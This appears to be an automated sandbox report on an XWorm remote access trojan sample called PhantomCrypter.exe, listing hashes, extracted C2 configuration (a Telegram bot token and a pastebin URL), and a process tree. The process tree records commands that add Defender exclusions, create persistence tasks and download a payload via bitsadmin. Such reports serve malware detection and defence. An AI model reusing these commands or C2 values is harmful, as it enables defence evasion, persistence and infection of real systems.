Analysis

  • max time kernel
    85s
  • max time network
    87s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250113-en
  • resource tags
    arch:x64, arch:x86, image:win10ltsc2021-20250113-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    25-01-2025 10:45

General

  • Target

    PhantomCrypter.exe

  • Size

    5.0MB

  • MD5

    d4d28f2c6fd9af9ee5a3be30f9ab913b

  • SHA1

    be4264bceaff957ff799b73ebc2479f0fc794815

  • SHA256

    c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e

  • SHA512

    7eed5b6d3420c930a07aee500e086ec61fd33099cd641a2efe7664081c0e5fdab4d1ad2b4835edcbe3e6722d44e60a75119a2900cfd00b7c182b20f379d7a977

  • SSDEEP

    98304:6l1z3/RZ58MoFyQbbpaR2p1AU6cBSdOWWzSPfEIeGLGIQaW5tqwZ0ch1+NXHKgv3:Y1z5Z58MQJe2PAU6cBSkWWzaETGDW/t

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

OnCH8EVI1tYADuXo

Attributes
  • Install_directory

    %LocalAppData%

  • install_file

    msedge.exe

  • pastebin_url

    https://pastebin.com/raw/RPPi3ByL

  • telegram

    https://api.telegram.org/bot7483240807:AAEYFrBoMgquxWoikOe9bVlqmoMC2b2AOO4/sendMessage?chat_id=5279018187

aes.plain

Signatures

  • Detect Xworm Payload 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 6 IoCs
  • Executes dropped EXE 8 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 36 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe
    "C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3464
    • C:\Users\Admin\AppData\Roaming\Chrome Update.exe
      "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3748
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4188
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:4576
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:2768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1116
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4244
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1900
      • C:\Windows\SysWOW64\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe
        3⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:1816
    • C:\Users\Admin\AppData\Roaming\msedge.exe
      "C:\Users\Admin\AppData\Roaming\msedge.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3220
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4692
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:1060
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:3508
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:4268
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2200
    • C:\Users\Admin\AppData\Roaming\OneDrive.exe
      "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4656
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:632
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:968
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        PID:3948
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2380
    • C:\Users\Admin\AppData\Roaming\TOPHERC.exe
      "C:\Users\Admin\AppData\Roaming\TOPHERC.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      PID:3880
  • C:\ProgramData\OneDrive.exe
    "C:\ProgramData\OneDrive.exe"
    1⤵
    • Executes dropped EXE
    PID:1696
  • C:\Users\Admin\AppData\Local\msedge.exe
    "C:\Users\Admin\AppData\Local\msedge.exe"
    1⤵
    • Executes dropped EXE
    PID:4616
  • C:\ProgramData\OneDrive.exe
    "C:\ProgramData\OneDrive.exe"
    1⤵
    • Executes dropped EXE
    PID:1308
  • C:\Users\Admin\AppData\Local\msedge.exe
    "C:\Users\Admin\AppData\Local\msedge.exe"
    1⤵
    • Executes dropped EXE
    PID:2920

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\OneDrive.exe.log

    Filesize

    654B

    MD5

    11c6e74f0561678d2cf7fc075a6cc00c

    SHA1

    535ee79ba978554abcb98c566235805e7ea18490

    SHA256

    d39a78fabca39532fcb85ce908781a75132e1bd01cc50a3b290dd87127837d63

    SHA512

    32c63d67bf512b42e7f57f71287b354200126cb417ef9d869c72e0b9388a7c2f5e3b61f303f1353baa1bf482d0f17e06e23c9f50b2f1babd4d958b6da19c40b0

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    3eb3833f769dd890afc295b977eab4b4

    SHA1

    e857649b037939602c72ad003e5d3698695f436f

    SHA256

    c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

    SHA512

    c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    f0f59cccd39a3694e0e6dfd44d0fa76d

    SHA1

    fccd7911d463041e1168431df8823e4c4ea387c1

    SHA256

    70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

    SHA512

    5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    60b3262c3163ee3d466199160b9ed07d

    SHA1

    994ece4ea4e61de0be2fdd580f87e3415f9e1ff6

    SHA256

    e3b30f16d41f94cba2b8a75f35c91ae7418465abfbfe5477ec0551d1952b2fdb

    SHA512

    081d2015cb94477eb0fbc38f44b6d9b4a3204fb3ad0b7d0e146a88ab4ab9a0d475207f1adae03f4a81ccc5beb7568dc8be1249f69e32fe56efd9ee2f6ee3b1af

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    217880b10b5c7db534e6ca11f04d3059

    SHA1

    a8ed869652e28617871b7a245185870e743e424b

    SHA256

    d5f871b09ecc1aa703a94e282cc786ca47c0020dc27f67a162854e6fa8a95793

    SHA512

    37f36749073eed66aa461d1ec57d45d6983f7623f12fb03abcc0ba4a08efe430d7a0632d93674f4671d7e3dce767927275dd56763a92eef5c40ddb02be2ccfc5

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    d9b023aba025ea7da423b289925e657b

    SHA1

    bbc92618b431ec1a52a0db3e42aafa91c056a208

    SHA256

    1a8c94830603da734d2c9e5178c30b639120937b79138cc5e49b6dbfa8ce4337

    SHA512

    24c2a91b77b216aff8afc2392fd647cb49567c0ac41c8f9610c9f94aeac8958490018f28bdc7174fcfd086862ab482ed4949c0e7f359239fdc18a13194feaf1d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    4eb1592ecfd799f8b528ca4adbbaef3e

    SHA1

    669179cc8407d3d7e5e30a8707379a3056ffb445

    SHA256

    4d94fa0280fc0b680305be8ca83344177069577a0b06cbb63f009b898e3341bc

    SHA512

    a3b60512ba3bb0e2d7c55e5927d548e6316a48ae1e69ef0a819550e72f023ae8b1767c6f45781e3a91e0c3c1357bc3cf344fb41f28ca89ddd13ecfee972e003e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    5dc0bf06113f867ab9be36428acea530

    SHA1

    bd73ca9bf3e5edc80370f4bc79eb403772440105

    SHA256

    d8e861ab4e7c40d5ccae45c056a72219decadc6061a0020cae2dfec8dc55e4ae

    SHA512

    e92b837a30d55b7d0f38aafc3a9403d77f2672b1de2113ba1926c7e84c89248813b50f942cbb72a166819f773b8ac4ba40d5a3329e1a815a2f833234b5a1d98d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    c238412481a146ab11982ee82490777c

    SHA1

    61451087cbd22daf63c18b6c3c939fe0952f27c3

    SHA256

    25f1c3a4b36ae44eb159193c17cc953ae3fa576928f2384865ab837a964bd9f2

    SHA512

    4ee702b05336364af8cb89a6dd162b9404a8307c5fef96b7af82e8db55459b65b0ce1ce6f6e3018aa213a73f42ba5dc80d8550e45baf756ef0b8b8459e7f9f9b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rhd3y4e0.wa1.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Chrome Update.exe

    Filesize

    152KB

    MD5

    16cdd301591c6af35a03cd18caee2e59

    SHA1

    92c6575b57eac309c8664d4ac76d87f2906e8ef3

    SHA256

    11d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8

    SHA512

    a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476

  • C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta

    Filesize

    844B

    MD5

    3f8a283abe6fe28a7d217c8105041426

    SHA1

    0283cd67e7cc0a99eeae3c3dea69716a6ac75bb1

    SHA256

    333c439c84ccbcab11dd9cc7f4d90596c5b65caf1164e8a908e61aa0222916b1

    SHA512

    bc5f8f256356c689953516877f8b7895fb1efe587feabdddf0e1524d0b22e3dcb89e0e654d19d0c314c6a376a0e7594965178a353d147ea98c43d3d5976f1846

  • C:\Users\Admin\AppData\Roaming\OneDrive.exe

    Filesize

    140KB

    MD5

    a1cd6f4a3a37ed83515aa4752f98eb1d

    SHA1

    7f787c8d72787d8d130b4788b006b799167d1802

    SHA256

    5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65

    SHA512

    9489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355

  • C:\Users\Admin\AppData\Roaming\TOPHERC.exe

    Filesize

    4.2MB

    MD5

    79f2fd33a188ff47216b4f4dd4552582

    SHA1

    16e40e0a1fed903fec20cd6cd600e3a2548881ad

    SHA256

    cc45d38fa00c5aeb33bdf842166460117b5e70b0b4fcf5bb6ef9747ec0b0575f

    SHA512

    caa33702fdc7e480a6093d2af035f860044a4e960fd6e5a4b91d6019f2c3d4c235d9e95734e6b54ea2a88af4e96bf72a54d81b2a70c1f64e76dcd202891905f2

  • C:\Users\Admin\AppData\Roaming\msedge.exe

    Filesize

    166KB

    MD5

    aee20d80f94ae0885bb2cabadb78efc9

    SHA1

    1e82eba032fcb0b89e1fdf937a79133a5057d0a1

    SHA256

    498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d

    SHA512

    3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42

  • memory/3220-56-0x0000000000250000-0x000000000027E000-memory.dmp

    Filesize

    184KB

  • memory/3464-0-0x00007FFC1FDB3000-0x00007FFC1FDB5000-memory.dmp

    Filesize

    8KB

  • memory/3464-1-0x0000000000530000-0x0000000000A38000-memory.dmp

    Filesize

    5.0MB

  • memory/3748-47-0x00000000009A0000-0x00000000009CC000-memory.dmp

    Filesize

    176KB

  • memory/3748-57-0x00007FFC1FDB0000-0x00007FFC20872000-memory.dmp

    Filesize

    10.8MB

  • memory/3748-218-0x00007FFC1FDB0000-0x00007FFC20872000-memory.dmp

    Filesize

    10.8MB

  • memory/3880-73-0x00000000059D0000-0x00000000059DA000-memory.dmp

    Filesize

    40KB

  • memory/3880-72-0x0000000005AD0000-0x0000000005B6C000-memory.dmp

    Filesize

    624KB

  • memory/3880-71-0x0000000005A30000-0x0000000005AC2000-memory.dmp

    Filesize

    584KB

  • memory/3880-70-0x0000000005F40000-0x00000000064E6000-memory.dmp

    Filesize

    5.6MB

  • memory/3880-68-0x0000000000BB0000-0x0000000000FE8000-memory.dmp

    Filesize

    4.2MB

  • memory/4188-83-0x00000297491F0000-0x0000029749212000-memory.dmp

    Filesize

    136KB

  • memory/4656-58-0x0000000000040000-0x0000000000068000-memory.dmp

    Filesize

    160KB